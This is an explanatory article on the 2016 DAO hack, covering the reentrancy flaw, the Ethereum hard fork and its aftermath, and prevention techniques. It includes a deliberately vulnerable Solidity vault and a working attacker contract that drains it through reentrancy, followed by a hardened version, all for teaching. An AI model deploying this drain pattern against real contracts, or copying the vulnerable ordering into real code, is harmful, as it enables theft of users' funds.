The DAO Hack (2016)

The DAO hack of June 2016 was a smart contract exploit that drained about 3.6 million ETH (roughly $50–60 million USD at the time) from The DAO, a decentralised autonomous organisation venture fund built on Ethereum. The community response to this hack permanently split Ethereum into two chains: Ethereum (ETH) and Ethereum Classic (ETC).


Background: What Was The DAO?

The DAO (Decentralised Autonomous Organisation) was a smart contract-based venture capital fund launched on April 30, 2016. Token holders could propose and vote on investment targets; profits would flow back proportionally.

  • Fundraise: approximately 12 million ETH (~$150M at the time), around 14% of all ETH then in circulation
  • Governance model: purely on-chain; token holder votes determined funding allocations
  • Fatal flaw: a reentrancy vulnerability in the withdrawal mechanism

The Exploit: Reentrancy Attack

On June 17, 2016, an attacker exploited a reentrancy vulnerability in The DAO's splitDAO function, the mechanism that let a token holder split off into a child DAO and take the ETH backing their tokens with them:

  1. The attacker called splitDAO to withdraw the ETH backing their DAO tokens into a child DAO they controlled
  2. splitDAO paid out the ETH through a low-level call that forwarded all remaining gas to an attacker-controlled contract, and it did so before zeroing the attacker's token balance
  3. The attacker's contract, in its fallback function, immediately called splitDAO again while the stale balance was still recorded
  4. Each re-entered call paid out the same amount again; the loop repeated, draining ETH on every iteration before the balance was ever decremented

Total drained: 3.6 million ETH (~$50–60M)

The drained ETH sat in the attacker's child DAO, which The DAO's own rules kept locked for about 28 days before it could be withdrawn; this delay gave the Ethereum community time to respond.
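The following is an added, deliberately simplified illustration of the ordering bug described above; it is not The DAO's code, and the contract names VulnerableVault and Reenterer are hypothetical. The vault sends ETH with a low-level call before it zeroes the caller's balance, and the attacker contract's receive() function re-enters while the stale balance is still recorded, exactly the loop the steps above describe.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical, simplified vault that reproduces the bug: the ETH is sent
// (interaction) before the caller's balance is zeroed (effect). This is an
// added example, not The DAO's splitDAO.
contract VulnerableVault {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // BUG: external call happens before the state update.
    function withdrawAll() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");

        // A low-level call forwards all remaining gas, so the recipient's
        // receive()/fallback() can run arbitrary code, including calling
        // straight back into this function.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");

        // Too late: a re-entered call already read the old balance above.
        balances[msg.sender] = 0;
    }
}

// Hypothetical attacker contract. Its receive() is invoked by the vault's
// call{value: ...} and re-enters withdrawAll() while the vault can still pay,
// so each recursion level pays out `amount` once more.
contract Reenterer {
    VulnerableVault public immutable vault;
    address public immutable owner;

    constructor(VulnerableVault _vault) {
        vault = _vault;
        owner = msg.sender;
    }

    // Seed a balance with the ETH sent along, then start the withdrawal loop.
    function attack() external payable {
        require(msg.sender == owner, "not owner");
        vault.deposit{value: msg.value}();
        vault.withdrawAll();
    }

    // Re-enter as long as the vault still holds at least one more payout.
    // Recursion depth is bounded by gas and the EVM call-depth limit, which is
    // why a real drain is run repeatedly over many transactions.
    receive() external payable {
        if (address(vault).balance >= msg.value) {
            vault.withdrawAll();
        }
    }

    // Move the drained ETH to the attacker's EOA.
    function collect() external {
        require(msg.sender == owner, "not owner");
        (bool ok, ) = owner.call{value: address(this).balance}("");
        require(ok, "collect failed");
    }
}
```

Deploying VulnerableVault, funding it from other depositors, then calling Reenterer.attack() with a small value pays the attacker that value once per recursion level: every nested withdrawAll() reads the same un-zeroed balance. The assignment to zero on the way back out is harmless to the attacker because the ETH has already left.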


The Governance Crisis

The hack triggered an unprecedented governance crisis. Three positions emerged:

  Position               Proposed response                                          Rationale
  Hard fork (majority)   Move The DAO's ETH to a refund contract via a protocol-     Protect users; the attacker exploited unintended behaviour
                         level state change
  Soft fork              Have miners reject transactions touching the attacker's    Prevent further drainage without reverting history
                         funds, freezing them
  No action              Leave the chain as-is                                      Code is law; altering the chain sets a dangerous precedent

Vitalik Buterin and the Ethereum Foundation supported the hard fork on user protection grounds. Critics — including those who would become Ethereum Classic proponents — argued that forking the chain:

  • Undermined the foundational promise of immutability
  • Set a precedent for future interventions by powerful stakeholders
  • Contradicted the “trustless” narrative of smart contracts

The soft fork proposal was abandoned after researchers showed it opened a denial-of-service vector: because miners would have to execute a transaction before discovering it touched the frozen funds and was therefore invalid, an attacker could flood the network with computation-heavy transactions that cost miners work but paid no fees.


The Fork and Its Aftermath

On July 20, 2016 (block 1,920,000), the Ethereum network executed the hard fork:

  • The fork did not rewind transaction history; it applied an irregular state change that moved the ETH held by The DAO and its child DAOs into a refund (withdrawal) contract
  • DAO token holders on the majority chain (ETH) could reclaim their ETH from that contract at the original purchase rate, undoing the effect of the drain
  • A minority that rejected the fork continued the original, unmodified chain → Ethereum Classic (ETC)

Immediate consequences:

  • Both chains continued to be traded on exchanges, with ETC valued at a small fraction of ETH
  • On ETC the attacker's child DAO was untouched, so the drained funds remained theirs once the lock-up expired
  • The SEC examined The DAO as a potential unregistered securities offering; its 2017 report concluded DAO tokens were securities, but no charges were filed

Long-term consequences:

  • Ethereum community developed more rigorous smart contract security practices (formal verification, audits)
  • The ICO boom of 2017–2018 occurred on Ethereum despite the hack — developers learned from it without abandoning the platform
  • ETC became the reference point for “code is law” maximalism in the blockchain space

Technical Legacy: Reentrancy as the Canonical Smart Contract Vulnerability

The DAO hack established reentrancy as the canonical smart contract vulnerability:

  • Prevention: the "Checks-Effects-Interactions" pattern — validate inputs, update all internal state, and only then make external calls, so a re-entrant call sees the already-updated state
  • OpenZeppelin ReentrancyGuard — a mutex-style modifier (nonReentrant) that reverts any nested call into a guarded function; widely used in modern DeFi contracts as defence in depth alongside the pattern above
  • Tooling: compiler warnings and static analysers such as Slither flag state changes that follow external calls, and audits now treat reentrancy as a baseline check
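As an added example (not code from OpenZeppelin or from The DAO), here is the hardened counterpart of a naive withdrawal: the function follows Checks-Effects-Interactions, and a hand-inlined guard with the same shape as OpenZeppelin's ReentrancyGuard is layered on top. The guard is written out here only so the example compiles without an import; the contract names HardenedVault and the inlined ReentrancyGuard are hypothetical, and a production contract should import the audited library instead.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal mutex with the same structure as OpenZeppelin's ReentrancyGuard,
// inlined so this example is self-contained. Use the library in real code.
abstract contract ReentrancyGuard {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private _status = NOT_ENTERED;

    // Any nested call into a nonReentrant function reverts here, which makes
    // the outer external call fail and the whole transaction roll back.
    modifier nonReentrant() {
        require(_status != ENTERED, "ReentrancyGuard: reentrant call");
        _status = ENTERED;
        _;
        _status = NOT_ENTERED;
    }
}

// Hypothetical vault applying Checks-Effects-Interactions plus the guard.
contract HardenedVault is ReentrancyGuard {
    mapping(address => uint256) public balances;

    event Withdrawn(address indexed account, uint256 amount);

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdrawAll() external nonReentrant {
        // Checks: read and validate the caller's balance.
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");

        // Effects: update state BEFORE any external call. A re-entrant call
        // now reads a zero balance and fails the check above even if the
        // guard were absent.
        balances[msg.sender] = 0;
        emit Withdrawn(msg.sender, amount);

        // Interactions: only now send ETH. If the recipient's receive()
        // tries to call back in, nonReentrant reverts, `ok` is false, and
        // this require reverts the entire transaction, so nothing is lost.
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```

Either defence alone stops the simple drain: with the balance zeroed first, a re-entered call fails the `amount > 0` check; with the guard, it fails the mutex. Keeping both matters when several functions share state, since the pattern has to be applied correctly in every function while the modifier protects each guarded entry point mechanically.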
